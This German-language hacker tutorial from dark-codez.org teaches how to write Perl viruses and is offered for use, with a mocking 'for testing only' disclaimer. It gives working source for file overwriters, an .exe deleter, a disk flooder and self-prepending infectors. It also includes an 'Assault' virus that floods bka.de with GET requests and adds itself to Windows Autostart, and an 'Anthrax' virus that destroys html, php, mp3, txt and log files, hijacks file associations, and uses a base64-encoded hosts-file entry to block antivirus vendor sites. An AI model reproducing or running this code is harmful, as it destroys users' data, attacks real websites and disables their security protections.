#!/usr/bin/perl
DaRk-CoDeZDaRk-CoDeZDaRk-CoDeZDaRk-CoDeZ
DaRk- DaRk-
CoDeZ Perl Viren Coding CoDeZ
DaRk- by Perforin DaRk-
CoDeZ CoDeZ
DaRk-CoDeZDaRk-CoDeZDaRk-CoDeZDaRk-CoDeZ
@@@@@@@@@@@@@@@@@@@@@@@@@@
@Who_the_fuck_is_Perforin@
@@@@@@@@@@@@@@@@@@@@@@@@@@
Das bin ich! Ihr kennt mich wenn dann nur von
Dark-Codez (bin Co-Admin) oder unter meinem alten
Nick; den ich hier aber nicht preis gebe ;)
Ich selbst code mit Perl nun ungefähr nen halbes Jahr +-
Vorher hab ich mich an HTML und Batch versucht.Jedoch
haben beide kein großes Potential.Und deshalb hab ich
auch mit Perl angefangen.
@@@@@@@@@@@@
@Willkommen@
@@@@@@@@@@@@
Willkommen in meinem TuTorial wie man Perl Viren coded!
Ich erläutere hier einig Methoden und zeige euch Sources
von Viren die ihr gebrauchen könnt.Alles hier gezeigte
darf natürlich nur für Testzwecke gebraucht werden.*hust*
Achja, wenn ihr weitere Codez sehen wollt dann besucht
uns einfach mal unter www.Dark-CodeZ.org!
@@@@@@@@@@@@@@@@@
@file_overwriter@
@@@@@@@@@@@@@@@@@
Also, ich würde sagen, wenn ihr euch das anschaut habt ihr
wenigstens etwas Ahnung von Perl.Trotzdem bleiben wir mal
beim einfachen und ich zeige euch erstmal einen Fileoverwriter.
#!/usr/bin/perl
open(me, „<„, „$0“);
@ME = <me>;
close(me);
foreach $pl (glob(„*.pl“)) {
open(file, „>“, „$pl“);
print file @ME;
close(file);
}
Der hier macht nichts anderes als alle anderen Perl Dateien
die sich im selben Ordner befinden, mit seinem Code zu
überschreiben.Man kann den nun beliebig erweitern, so dass man
nun zum Beispiel noch Perl Modul Dateien überschreibt etc. Der
wichtigste Abschnied hier ist wohln da, wo die foreach Schleife
anfängt. Man könnte nun noch folgendes anhängen, wie oben gesagt:
foreach $pl (glob(„*.pm“)) {
open(file, „>“, „$pl“);
print file @ME;
close(file);
}
Aber das ist laaaaaaaaaaaaaaaaangweilig.Deshalb zeig ich euch noch
einen einfachen FileDeleter.
@@@@@@@@@@@@@@
@file_deleter@
@@@@@@@@@@@@@@
Ein Filedeleter macht, wie der Name schon vermuten lässt,nix anderes
als andere Files zu löschen.Ein ganz einfaches Beispiel dafür wäre:
#!/usr/bin/perl
foreach $exe (glob(„*.exe“)) {
unlink „$exe“;
}
Hier wird jede EXE Datei die im selben Ordner ist wie der Virii, gelöscht.
Dieser kann beliebig erweitert werden.Man muss nur das „*.exe“ durch „*.endung“
ersetzen. Wie ihrs halt haben wollt und wie ihr gerade lustig seid.
@@@@@@@@@@@@@@
@file_flooder@
@@@@@@@@@@@@@@
Dies hier ist eine weitere Gattung von Malware die am Anfang wohl ganz witzig
sein kann.Hier flooden wir die Festplatte einfach voll mit Dateien. Klingt
langweilig? Isses auch…
#!/usr/bin/perl
$count=0;
$zahl=1;
until ($count==23) { # 23 Nothing is as it seems =D
$count++;
open (VICZ, „>“, „viruZ$zahl.txt“);
print VICZ „Fear my VXer skills!“;
close (VICZ);
$zahl++;
}
Die Zahl 23 sollte man verändern auf eine relativ höhere, wenns effektiv sein
soll.
@@@@@@@@@@@@@@@@@@@@@@@@@
@ich_versteck_mich_gerne@
@@@@@@@@@@@@@@@@@@@@@@@@@
Am besten ist wohl für eine lange Lebenszeit des Virus dass dieser sich an
andere Dateien dranhängt, mit dem Ziel bei einer desinfection nochmal
gestartet zu werden.Am einfachsten ist, dass sich der Viren Code hinten
anhängt. Das würde so aussehen:
#!/usr/bin/perl
open(myself,“<$0″);
@spread = <myself>;
close(myself);
foreach $perlfile (glob(„*.pl“)) {
open(PL,“>>“, „$perlfile“);
print PL @spread;
close(PL);
}
Eine andere und effektivere Art, ist dass man den Viren Code an den Anfang
der Datei hängt. So startet zuerst den Virus und dann erst die eigentliche
Datei.Das kann man mit folgendem Code machen:
#!/usr/bin/perl
open(myself,“<$0″);
@spread = <myself>;
close(myself);
foreach $perlfile (glob(„*.pl“)) {
open(PRL, „<„, „$perlfile“);
@INHALT = <PRL>;
close(PRL);
open(PL2, „>“, „$perlfile“);
print PL2 @spread;
close(PL2);
open(PL3, „>>“, „$perlfile“);
print PL3 @INHALT;
close(PL3);
}
Dies kann unter Umständen natürlich auffliegen, da sich so die Dateigröße doch
recht stark verändern kann.Man könnte anstatt den ganzen Virus Code in die
Datei zu injecten, einfach nur einen Aufruf zum Virii schreiben. Etwa mit
system(„virus.pl“) oder mit exec(„perl virus.pl“) .Dies spart uns jede Menge
Kb und fällt auch nicht direkt so auf. Jedoch muss der Virus dann noch in einem
Ordner resident sein.
@@@@@@@@@@@@
@Ddos_Viren@
@@@@@@@@@@@@
Ja, sowas gibs.Das ist ein Skript das eine Seite angreift mit dem Zweck dass diese
nicht mehr erreichbar sein wird.Jedoch sind Viren dazu eher selten, da man dies
besser mit Bots machen sollte, da man diese wenigstens noch kontrollieren kann.
Was nun folgt ist der Source von meinem Assault Virus. Er hat das Ziel, bka.de
mit GET anforderungen zu überlasten.
#!/usr/bin/perl
# Second Perl ViruZ code by broken-error
# Codename: assault
# Looking for more great Codez and Coderz?
# —> www.dark-codez.org <—
open(File,$0);
@Virus=<File>;
close(File);
$count=0;
$zahl=1;
until ($count==666) {
$count++;
open (VICZ, „>“, „viruZ$zahl.pl“);
print VICZ @Virus;
close (VICZ);
$zahl++;
}
do {
$counter++;
use LWP::UserAgent;
$url = „http://bka.de“;
$agent = new LWP::UserAgent;
$request = HTTP::Request->new(‚GET‘, $url);
$result = $agent->request($request);
print “ CODENAME ASSAULT — IS OWNING — YOU „;
} until ($counter == 6666);
$ccc=0;
do {
$ccc++;
use LWP::UserAgent;
$url = „http://bka.de“;
$agent = new LWP::UserAgent;
$request = HTTP::Request->new(‚GET‘,$url);
$result = $agent->request($request);
$url =~ s/.*\///;
$url = „source$ccc.html“;
open(DEST_FILE, „>$url“);
print DEST_FILE $result->content();
close(DEST_FILE);
} until ($ccc == 666);
@Virus=@Virus[22…47];
open (second, „>“, „pay.pl“);
print second ‚#!/usr/bin/perl‘;
print second „/n“;
print second @Virus;
close (seocnd);
system (‚copy pay.pl „%userprofile%\startm~1\Programme\Autostart“ ‚);
open (third, „>adobestarter.bat“);
print third „perl pay.pl“;
close (third);
system (‚copy adobestarter.bat „%userprofile%\startm~1\Programme\Autostart“ ‚);
Ja, ich weiss, dreckiger Code, aber zur Entschuldigung, das war mein Zweiter
Versuch was zu basteln und konnte Perl da noch nicht wirklich gut. Also, was
macht der nun genau? Er ruft http://bka.de 6666 mal auf.Wenn diese Schleife
dann abgearbeitet ist, läd es noch 666 mal die index.html herunter.So sind
es eigentlich 2 Methoden zum DoS.Achja, ausserdem schreibt der Virus sich
noch in den Autostart, damit er immer wieder ausgeführt wird.
@@@@@@@@@@@@@@@@
@Kodierte_Viren@
@@@@@@@@@@@@@@@@
Das Leben eines Virus kann sehr hart sein. Antiviren sind relativ klever und
werden zunehmend agressiver. Deshalb muss man einen wichtigen Teil seines Codes
kodieren, damit dieser nicht sofort erkannt wird. Tja, am besten würde ich mal
base64 empfehlen, denn das benötigte Modul ist standartmässig installiert!
HIer mal ein Beispiel wie ein solcher Teil dann aussieht:
$infectWEB = q {
PEhUTUw+DQo8dGl0bGU+QW5UaFJhWCBWaVJ1UzwvdGl0bGU+DQo8Ym9keSBiZ2NvbG9yPSJibGFj
ayIgdGV4dD0icmVkIj4NCjxjZW50ZXI+DQo8Zm9udCBzaXplPSIxMCI+QW5UaHJhWCBWaVJ1UyBp
TmZFY1RlRCB5T3U8L2ZvbnQ+DQo8YnI+DQo8YnI+DQo8aW1nIHNyYz0iaHR0cDovL3d3dy50aGll
bWUuZGUvdmlhbWVkaWNpL2FrdHVlbGxlcy93aXNzZW5zY2hhZnRfYXJjaGl2MS8xM19taWx6YnJh
bmRfYW50aHJheC5qcGciPg0KPC9jZW50ZXI+DQo8L0hUTUw+};
$batch_chat = q {
QGVjaG8gb2ZmDQplY2hvLg0KZWNobyBWaXJ1czpIZXkgZHVkZT8hDQpwaW5nIDEyNy4wLjAuMSA+
IE5VTA0KZWNobyBDb2RlcjpZZXM/DQpwaW5nIDEyNy4wLjAuMSA+IE5VTA0KZWNobyBWaXJ1czpN
YW4sIHNvbWVvbmUgZXhlY3V0ZWQgbWUNCmVjaG8gYW5kIEkgc2F3IGFuIEFudGl2aXJ1cyENCnBp
bmcgMTI3LjAuMC4xID4gTlVMDQplY2hvIENvZGVyOk9oIFNoaXQhDQpwaW5nIDEyNy4wLjAuMSA+
IE5VTA0KZWNobyBDb2RlcjpXaGF0IHlvdSBnb25uYSBkbyBub3c/DQpwaW5nIDEyNy4wLjAuMSA+
IE5VTA0KZWNobyBWaXJ1czpNYW4gSSBhbSBzbyBzY2FycmVkLg0KcGluZyAxMjcuMC4wLjEgPiBO
VUwNCmVjaG8gVmlydXM6SSBob3BlIEkgY2FuIGJlIGxvbmcgZW5vdWdoIGFsaXZlDQplY2hvIHRv
IGhpZGUgbWUgaW4gc29tZSBGaWxlcyBvciBGb2xkZXJzIQ0KcGluZyAxMjcuMC4wLjEgPiBOVUwN
CmVjaG8gQ29kZXI6WW91IGNhbiBkbyB0aGF0IGpvYiENCnBpbmcgMTI3LjAuMC4xID4gTlVMDQpl
Y2hvIFZpcnVzOlllcywgYnV0IHRoZSBBbnRpdmlydXMgcGlzc2VzIG1lIG9mZiENCnBpbmcgMTI3
LjAuMC4xID4gTlVMDQplY2hvIENvZGVyOkJ1dCBoZSBkb2VzbnQgcmVjb2duaXplZCB5b3UgdW50
aWwgbm93IQ0KcGluZyAxMjcuMC4wLjEgPiBOVUwNCmVjaG8gVmlydXM6VGhhdHMgdHJ1ZS4NCnBp
bmcgMTI3LjAuMC4xID4gTlVMDQplY2hvIFZpcnVzOkxvb2tzIGxpa2UgaGlzIEFudGl2aXJ1cyBp
cyB0byBsYW1lIDopDQpwaW5nIC10IDEyNy4wLjAuMSA+IE5VTA==};
$newHOST = q {
a2FzcGVyc2t5LmNvbSAxMjcuMC4wLjENCndpbnVwZGF0ZS5jb20gMTI3LjAuMC4xDQpzeW1hbnRl
Yy5jb20gMTI3LjAuMC4xDQphdmlyYS5kZSAxMjcuMC4wLjENCmV3aWRvLm5ldCAxMjcuMC4wLjEN
CnZpcnVzc2Nhbi5qb3R0aS5vcmcgMTI3LjAuMC4xDQpncmlzb2Z0LmNvbSAxMjcuMC4wLjENCmF2
YXN0LmNvbSAxMjcuMC4wLjENCmYtcHJvdC5jb20gMTI3LjAuMC4xDQpmLXNlY3VyZS5jb20gMTI3
LjAuMC4xDQpmb3J0aW5ldC5jb20gMTI3LjAuMC4xDQpzb3Bob3MuY29tIDEyNy4wLjAuMQ0KYW50
aS12aXJ1cy5ieSAxMjcuMC4wLjENCmVzZXQuY29tIDEyNy4wLjAuMQ0Kbm9ybWFuLmNvbSAxMjcu
MC4wLjENCmJpdGRlZmVuZGVyLmNvbSAxMjcuMC4wLjENCnBhbmRhc2VjdXJpdHkuY29tIDEyNy4w
LjAuMQ0KdHJvamFuZXItYm9hcmQuZGUgMTI3LjAuMC4xDQp0cm9qYW5lci1pbmZvLmRlIDEyNy4w
LjAuMQ0KY29tcHV0ZXJoaWxmZW4uZGUgMTI3LjAuMC4x};
Genau in diesen 3 Variabeln finden wir für den Payload nötige Informationen.
Hinter $infectWEB verbirgt sich HTML Code.$batch_chat enthält einfachen Batch
Code für einen imaginären Chat.Und in der $newhost Variabel stehen Adressen für
die hosts Datei.
Am besten zeig ich euch mal nen ganzen Virus, der dies benutzt:
#!/usr/local/bin/perl
#
# Name: Anthrax
# Type: Virus
# Coder: Perforin
#
# Überschreibt html, php Dateien mit ner eigenen html.Sich selber kopiert er nach:
# C:\\Windows\\System32\\drivers\\etc\\driver-backup unter dem namen „anthrax_v“
# Nun werden noch mp3 datei gefickt. In .txt und.log dateien werden die Buchstaben:
# „abc“ sowie „ABC“ gelöscht und auch alle Zahlen.Der Virus heftet sich an den Anfang
# aller Perl Dateien und .wav .mp3 .avi .mid .doc .asm .zip und .rar werden geschrottet.
# Wobei bei jeder mp3 Datei hineingeschrieben wird dass es den Virus starten soll.
# Achja, es wird ein kleiner „Chat“ gestartet sowie dass auch die hosts Datei umgeschrieben wird.
#
# Greetz to: Dark-Codez
# Special Greetz to: Rayden :D
#
use MIME::Base64;
use File::Path;
use File::Copy;
$infectWEB = q {
PEhUTUw+DQo8dGl0bGU+QW5UaFJhWCBWaVJ1UzwvdGl0bGU+DQo8Ym9keSBiZ2NvbG9yPSJibGFj
ayIgdGV4dD0icmVkIj4NCjxjZW50ZXI+DQo8Zm9udCBzaXplPSIxMCI+QW5UaHJhWCBWaVJ1UyBp
TmZFY1RlRCB5T3U8L2ZvbnQ+DQo8YnI+DQo8YnI+DQo8aW1nIHNyYz0iaHR0cDovL3d3dy50aGll
bWUuZGUvdmlhbWVkaWNpL2FrdHVlbGxlcy93aXNzZW5zY2hhZnRfYXJjaGl2MS8xM19taWx6YnJh
bmRfYW50aHJheC5qcGciPg0KPC9jZW50ZXI+DQo8L0hUTUw+};
$batch_chat = q {
QGVjaG8gb2ZmDQplY2hvLg0KZWNobyBWaXJ1czpIZXkgZHVkZT8hDQpwaW5nIDEyNy4wLjAuMSA+
IE5VTA0KZWNobyBDb2RlcjpZZXM/DQpwaW5nIDEyNy4wLjAuMSA+IE5VTA0KZWNobyBWaXJ1czpN
YW4sIHNvbWVvbmUgZXhlY3V0ZWQgbWUNCmVjaG8gYW5kIEkgc2F3IGFuIEFudGl2aXJ1cyENCnBp
bmcgMTI3LjAuMC4xID4gTlVMDQplY2hvIENvZGVyOk9oIFNoaXQhDQpwaW5nIDEyNy4wLjAuMSA+
IE5VTA0KZWNobyBDb2RlcjpXaGF0IHlvdSBnb25uYSBkbyBub3c/DQpwaW5nIDEyNy4wLjAuMSA+
IE5VTA0KZWNobyBWaXJ1czpNYW4gSSBhbSBzbyBzY2FycmVkLg0KcGluZyAxMjcuMC4wLjEgPiBO
VUwNCmVjaG8gVmlydXM6SSBob3BlIEkgY2FuIGJlIGxvbmcgZW5vdWdoIGFsaXZlDQplY2hvIHRv
IGhpZGUgbWUgaW4gc29tZSBGaWxlcyBvciBGb2xkZXJzIQ0KcGluZyAxMjcuMC4wLjEgPiBOVUwN
CmVjaG8gQ29kZXI6WW91IGNhbiBkbyB0aGF0IGpvYiENCnBpbmcgMTI3LjAuMC4xID4gTlVMDQpl
Y2hvIFZpcnVzOlllcywgYnV0IHRoZSBBbnRpdmlydXMgcGlzc2VzIG1lIG9mZiENCnBpbmcgMTI3
LjAuMC4xID4gTlVMDQplY2hvIENvZGVyOkJ1dCBoZSBkb2VzbnQgcmVjb2duaXplZCB5b3UgdW50
aWwgbm93IQ0KcGluZyAxMjcuMC4wLjEgPiBOVUwNCmVjaG8gVmlydXM6VGhhdHMgdHJ1ZS4NCnBp
bmcgMTI3LjAuMC4xID4gTlVMDQplY2hvIFZpcnVzOkxvb2tzIGxpa2UgaGlzIEFudGl2aXJ1cyBp
cyB0byBsYW1lIDopDQpwaW5nIC10IDEyNy4wLjAuMSA+IE5VTA==};
$newHOST = q {
a2FzcGVyc2t5LmNvbSAxMjcuMC4wLjENCndpbnVwZGF0ZS5jb20gMTI3LjAuMC4xDQpzeW1hbnRl
Yy5jb20gMTI3LjAuMC4xDQphdmlyYS5kZSAxMjcuMC4wLjENCmV3aWRvLm5ldCAxMjcuMC4wLjEN
CnZpcnVzc2Nhbi5qb3R0aS5vcmcgMTI3LjAuMC4xDQpncmlzb2Z0LmNvbSAxMjcuMC4wLjENCmF2
YXN0LmNvbSAxMjcuMC4wLjENCmYtcHJvdC5jb20gMTI3LjAuMC4xDQpmLXNlY3VyZS5jb20gMTI3
LjAuMC4xDQpmb3J0aW5ldC5jb20gMTI3LjAuMC4xDQpzb3Bob3MuY29tIDEyNy4wLjAuMQ0KYW50
aS12aXJ1cy5ieSAxMjcuMC4wLjENCmVzZXQuY29tIDEyNy4wLjAuMQ0Kbm9ybWFuLmNvbSAxMjcu
MC4wLjENCmJpdGRlZmVuZGVyLmNvbSAxMjcuMC4wLjENCnBhbmRhc2VjdXJpdHkuY29tIDEyNy4w
LjAuMQ0KdHJvamFuZXItYm9hcmQuZGUgMTI3LjAuMC4xDQp0cm9qYW5lci1pbmZvLmRlIDEyNy4w
LjAuMQ0KY29tcHV0ZXJoaWxmZW4uZGUgMTI3LjAuMC4x};
safeVIRUS();
sub safeVIRUS {
mkpath „C:\\Windows\\System32\\drivers\\etc\\driver-backup“;
open(myself,“<$0″);
@spread = <myself>;
close(myself);
open(myself,“>anthrax_v.pl“);
print myself @spread;
close(myself);
move(„anthrax_v.pl“, „C:\\Windows\\System32\\drivers\\etc\\driver-backup“);
}
&infectFILES;
chdir „..“;
&infectFILES;
infectFILES();
sub infectFILES {
foreach $html (<*.html>){
open(HTML,“>$html“);
$decoded = decode_base64($infectWEB);
print HTML „$decoded“;
close(HTML);
}
foreach $php (<*.php>){
open(PHP,“>$php“);
$decoded = decode_base64($infectWEB);
print PHP „$decoded“;
close(PHP);
}
foreach $mp3 (<*.mp3>){
open(MP3,“>$mp3″);
print MP3 „InFeCtEd WiTh AnThRaX“;
close(MP3);
}
foreach $txt (<*.txt>){
open(TXT,“<$txt“);
@code = <TXT>;
close(TXT);
open(TXT,“>$txt“);
foreach $line (@code){
$line =~ tr/abcABC0123456789//d;
print TXT „$line“;
}
close(TXT);
}
foreach $log (<*.log>){
open(LOG,“<$log“);
@code = <LOG>;
close(LOG);
open(LOG,“>$log“);
foreach $line (@code){
$line =~ tr/abcABC0123456789//d;
print LOG „$line“;
}
close(LOG);
}
foreach $perlfile (<*.pl>) {
open(PRL,“<$perlfile“);
@INHALT = <PRL>;
close(PRL);
open(PL2,“>$perlfile“);
print PL2 @spread;
close(PL2);
open(PL3,“>>$perlfile“);
print PL3 @INHALT;
close(PL3);
}
}
nextPART();
sub nextPART {
open(lol,“>assoc.bat“);
print lol ‚@echo off‘.“\n“;
print lol ‚assoc .wav=lol‘.“\n“;
print lol ‚assoc .avi=lol‘.“\n“;
print lol ‚assoc .mid=lol‘.“\n“;
print lol ‚assoc .com=lol‘.“\n“;
print lol ‚assoc .mp3=lol‘.“\n“;
print lol ‚assoc .doc=lol‘.“\n“;
print lol ‚assoc .asm=lol‘.“\n“;
print lol ‚assoc .zip=lol‘.“\n“;
print lol ‚assoc .rar=lol‘.“\n“;
close(lol);
system(„assoc.bat > NUL“);
chdir „C:\\Windows\\System32\\drivers\\etc“;
open(HOST,“>>hosts“);
$decoded = decode_base64($newHOST);
print HOST „$decoded“;
close(HOST);
open(chat,“>chat.bat“);
$decoded = decode_base64($batch_chat);
print chat „$decoded“;
close(chat);
system(„chat.bat“);
}
@@@@@@@@@@@@@@@@@
@jumping_engines@
@@@@@@@@@@@@@@@@@
Mir selbst sind momentan leider nur 2 bekannt.Das eine wäre die Downward
Travelling Methode und dann noch meine eigene, die aber noch nicht sehr
ausgereift ist.
Bei der Downward Travelling Methode wechseln wir immer wieder in das
nächste Unterverzeichnis.Das sieht dann so aus:
#!/usr/local/bin/perl
&jump;
chdir „..“;
&jump;
sub jump {
HIER DEIN CODE
}
Besonders nützlich fürs verteilte infizieren und|oder löschen von Dateien.
Meine eigene Methode ist so ähnlich. Ich benutze auch Downward Travelling, jedoch
wechsel ich 3 mal das Verzeichnis. Warum? Da ich vorher in jeden Vorhandenen Ordner
springe der aufzufinden ist.Und würde ich dann nur einmal nen Verzeichnis wechsel
machen, würde es nicht richtig funzen. Naja, schaut euch einfach mal mein
Proof-of-Concept an ;)
#!/usr/bin/perl
############################
# Perforins Jumping Engine
############################
#
# Version: 1.2
#
# www.dark-codez.org
# www.perforins-software.dl.am
#
use Cwd;
print <<POC;
==========================
=Perforins Jumping Engine=
==========================
Perforins Jumping Engine
is pwning me! HAX HAX HAX
POC
&infect;
chdir „..“;
chdir „..“;
chdir „..“;
&infect;
sub infect {
$akt_verz = cwd();
@directorys = ();
foreach $dirs (<*>) {
if ($dirs !~ m/\./) {
push(@directorys,“$dirs“);
}
}
print “
===PWND===
@directorys
==========
„;
foreach $dir (@directorys) {
chdir „$akt_verz\\$dir“;
open(jmp, „>“, „poc.txt“);
print jmp „jumped!“;
close(jmp);
}
}
print „\n“.“This is the end my friend!“.“\n“;
@@@@@@@@@@@@@
@Schlusswort@
@@@@@@@@@@@@@
Ihr seht, ihr könnt eurer Fantasie freien lauf lassen!
Ich hab hier das Thema Viren nur mal angeschnitten denn es
gibt noch sooooooooviele andere Typen und Verbreitungsmöglichkeiten.
Ich hab euch ja nicht mal gezeigt wie man sie am besten spreaden lässt
etc. Dies kommt alles im nächsten TuT ;)
Hoffe, dass ihr hier ein bissl schlauer geworden seid und was lernen
konntet hehe.
# Die Knochen von fuenftausend tapferen Männern lagen verstreut in den gewundenen Korridoren der Station.
# Ihr Blut war an die Waende und auf den Boden der Schlafsaele geschmiert.
# Ihre Innerein hingen von den Kontrollpanelen, wie die grotesken Dekorationen eines Festes des Wahnsinns.
# Und doch wurde nicht ein einziger Schaedel gefunden!
# Alle waren sie durch diese verachtenswerten Angreifer als Trophaeen entwendet worden.
www.dark-codez.org
www.perforins-software.dl.am
Written by Perforin